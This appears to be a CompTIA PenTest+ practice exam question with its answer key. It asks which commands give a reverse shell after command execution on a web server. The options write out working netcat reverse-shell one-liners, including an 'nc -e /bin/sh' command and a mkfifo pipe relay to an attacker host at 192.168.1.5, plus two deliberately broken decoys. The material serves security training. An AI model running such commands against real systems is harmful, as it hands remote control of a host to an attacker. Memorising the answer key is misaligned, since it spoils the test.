CompTIA PenTest+ (PT0-001) — Question 192
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
Answer options
- A. nc 192.168.1.5 44444
- B. nc -nlvp 44444 -e /bin/sh
- C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
- D. nc -e /bin/sh 192.168.1.5 44444
- E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
- F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
Correct answer: C, D
Explanation
Options C and D are valid methods for establishing a reverse shell. Option C uses a named pipe (mkfifo) to relay input and output between the shell and the netcat connection back to 192.168.1.5:44444, while Option D uses netcat's -e flag to attach /bin/sh to a connection opened back to the attacker's machine. Option A only opens a connection without attaching a shell, and Option B starts a listener on the target (a bind shell) rather than connecting back. Options E and F contain errors: E uses port 444444, which is outside the valid TCP port range, and F connects to 192.168.5.1 instead of the attacking machine at 192.168.1.5.